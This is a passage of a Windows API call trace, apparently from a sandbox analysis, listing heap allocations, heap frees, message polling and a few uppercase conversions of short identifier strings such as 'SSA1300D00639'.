dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0201.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0201.113] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0201.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.114] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0201.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0201.116] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0201.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0201.116] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0201.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0201.117] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0201.117] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0201.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.118] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0201.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0201.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0201.119] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0201.119] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0201.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0201.119] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0201.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0201.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0201.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0201.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0201.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.121] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.121] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0201.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0201.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0201.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0201.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0201.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0201.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) 